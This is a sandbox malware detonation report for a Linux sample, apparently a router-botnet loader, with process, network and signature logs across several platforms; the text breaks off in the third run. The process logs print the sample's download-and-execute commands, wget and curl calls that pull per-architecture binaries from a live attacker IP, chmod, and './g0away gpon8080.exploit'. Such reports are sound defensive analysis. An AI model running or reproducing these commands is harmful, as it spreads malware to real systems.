Malware Analysis Report

2024-10-24 21:20

Sample ID 240728-t6pvdswhqb
Target 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118
SHA256 36c3310e8853358d2d68f7b1f0ebd3b52f9691f58286799d1a7b9413903d5588
Tags
antivm
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

36c3310e8853358d2d68f7b1f0ebd3b52f9691f58286799d1a7b9413903d5588

Threat Level: Shows suspicious behavior

The file 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 was found to be: Shows suspicious behavior.

Malicious Activity Summary

antivm

Executes dropped EXE

Checks CPU configuration

Reads runtime system information

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-28 16:40

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-28 16:40

Reported

2024-07-29 11:21

Platform

ubuntu1804-amd64-20240729-en

Max time kernel

80s

Max time network

128s

Command Line

[/tmp/17f41b4b65e5ddad4a76594560d43927_JaffaCakes118]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/g0away /tmp/17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 N/A

Processes

/tmp/17f41b4b65e5ddad4a76594560d43927_JaffaCakes118

[/tmp/17f41b4b65e5ddad4a76594560d43927_JaffaCakes118]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.x86]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.x86]

/bin/cat

[cat m3th.x86]

/bin/chmod

[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-timedated.service-YpXBgT]

/tmp/g0away

[./g0away gpon8080.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mips]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mips]

/bin/cat

[cat m3th.mips]

/bin/chmod

[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-timedated.service-YpXBgT]

/tmp/g0away

[./g0away gpon8080.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mpsl]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mpsl]

/bin/cat

[cat m3th.mpsl]

/bin/chmod

[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-timedated.service-YpXBgT]

/tmp/g0away

[./g0away gpon8080.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm]

/bin/cat

[cat m3th.arm]

/bin/chmod

[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-timedated.service-YpXBgT]

/tmp/g0away

[./g0away gpon8080.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm5]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm5]

/bin/cat

[cat m3th.arm5]

/bin/chmod

[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja]

/tmp/g0away

[./g0away gpon8080.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm6]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm6]

/bin/cat

[cat m3th.arm6]

/bin/chmod

[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja]

/tmp/g0away

[./g0away gpon8080.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm7]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm7]

/bin/cat

[cat m3th.arm7]

/bin/chmod

[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja]

/tmp/g0away

[./g0away gpon8080.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.ppc]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.ppc]

/bin/cat

[cat m3th.ppc]

/bin/chmod

[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja]

/tmp/g0away

[./g0away gpon8080.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.m68k]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.m68k]

/bin/cat

[cat m3th.m68k]

/bin/chmod

[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja]

/tmp/g0away

[./g0away gpon8080.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.spc]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.spc]

/bin/cat

[cat m3th.spc]

/bin/chmod

[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja]

/tmp/g0away

[./g0away gpon8080.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.i686]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.i686]

/bin/cat

[cat m3th.i686]

/bin/chmod

[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja]

/tmp/g0away

[./g0away gpon8080.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.sh4]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.sh4]

/bin/cat

[cat m3th.sh4]

/bin/chmod

[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja]

/tmp/g0away

[./g0away gpon8080.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arc]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arc]

/bin/cat

[cat m3th.arc]

/bin/chmod

[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 config-err-QezUlM g0away netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja]

/tmp/g0away

[./g0away gpon8080.exploit]

Network

Country Destination Domain Proto
US 151.101.193.91:443 tcp
GB 185.125.188.61:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.193.91:443 tcp
HR 45.95.168.230:80 tcp
N/A 224.0.0.251:5353 udp
GB 84.17.50.9:443 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-28 16:40

Reported

2024-07-29 10:38

Platform

debian9-armhf-20240729-en

Max time kernel

86s

Max time network

87s

Command Line

[/tmp/17f41b4b65e5ddad4a76594560d43927_JaffaCakes118]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/g0away /tmp/17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 N/A

Processes

/tmp/17f41b4b65e5ddad4a76594560d43927_JaffaCakes118

[/tmp/17f41b4b65e5ddad4a76594560d43927_JaffaCakes118]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.x86]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.x86]

/bin/cat

[cat m3th.x86]

/bin/chmod

[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away systemd-private-fd0610902d48473fb76a33ea0471cf99-systemd-timedated.service-Z1pgjC]

/tmp/g0away

[./g0away gpon8080.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mips]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mips]

/bin/cat

[cat m3th.mips]

/bin/chmod

[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away systemd-private-fd0610902d48473fb76a33ea0471cf99-systemd-timedated.service-Z1pgjC]

/tmp/g0away

[./g0away gpon8080.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mpsl]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mpsl]

/bin/cat

[cat m3th.mpsl]

/bin/chmod

[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon8080.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm]

/bin/cat

[cat m3th.arm]

/bin/chmod

[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon8080.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm5]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm5]

/bin/cat

[cat m3th.arm5]

/bin/chmod

[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon8080.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm6]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm6]

/bin/cat

[cat m3th.arm6]

/bin/chmod

[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon8080.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm7]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm7]

/bin/cat

[cat m3th.arm7]

/bin/chmod

[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon8080.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.ppc]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.ppc]

/bin/cat

[cat m3th.ppc]

/bin/chmod

[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon8080.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.m68k]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.m68k]

/bin/cat

[cat m3th.m68k]

/bin/chmod

[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon8080.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.spc]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.spc]

/bin/cat

[cat m3th.spc]

/bin/chmod

[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon8080.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.i686]

Network

Country Destination Domain Proto
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp
HR 45.95.168.230:80 tcp

Files

memory/738-1-0xb6703000-0xb6714044-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-07-28 16:40

Reported

2024-07-29 10:54

Platform

debian9-mipsbe-20240729-en

Max time kernel

99s

Max time network

101s

Command Line

[/tmp/17f41b4b65e5ddad4a76594560d43927_JaffaCakes118]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A
N/A /tmp/g0away /tmp/g0away N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/g0away /tmp/17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 N/A

Processes

/tmp/17f41b4b65e5ddad4a76594560d43927_JaffaCakes118

[/tmp/17f41b4b65e5ddad4a76594560d43927_JaffaCakes118]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.x86]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.x86]

/bin/cat

[cat m3th.x86]

/bin/chmod

[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away systemd-private-ce23345392e24b8a904cde81b8d5bf52-systemd-timedated.service-7vrsuE]

/tmp/g0away

[./g0away gpon8080.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mips]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mips]

/bin/cat

[cat m3th.mips]

/bin/chmod

[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away systemd-private-ce23345392e24b8a904cde81b8d5bf52-systemd-timedated.service-7vrsuE]

/tmp/g0away

[./g0away gpon8080.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mpsl]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mpsl]

/bin/cat

[cat m3th.mpsl]

/bin/chmod

[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away systemd-private-ce23345392e24b8a904cde81b8d5bf52-systemd-timedated.service-7vrsuE]

/tmp/g0away

[./g0away gpon8080.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm]

/bin/cat

[cat m3th.arm]

/bin/chmod

[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon8080.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm5]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm5]

/bin/cat

[cat m3th.arm5]

/bin/chmod

[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon8080.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm6]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm6]

/bin/cat

[cat m3th.arm6]

/bin/chmod

[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon8080.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm7]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm7]

/bin/cat

[cat m3th.arm7]

/bin/chmod

[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon8080.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.ppc]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.ppc]

/bin/cat

[cat m3th.ppc]

/bin/chmod

[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon8080.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.m68k]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.m68k]

/bin/cat

[cat m3th.m68k]

/bin/chmod

[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon8080.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.spc]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.spc]

/bin/cat

[cat m3th.spc]

/bin/chmod

[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon8080.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.i686]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.i686]

/bin/cat

[cat m3th.i686]

/bin/chmod

[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon8080.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.sh4]

/usr/bin/curl

[curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.sh4]

/bin/cat

[cat m3th.sh4]

/bin/chmod

[chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away]

/tmp/g0away

[./g0away gpon8080.exploit]

/usr/bin/wget

[wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arc]

/usr/bin/curl

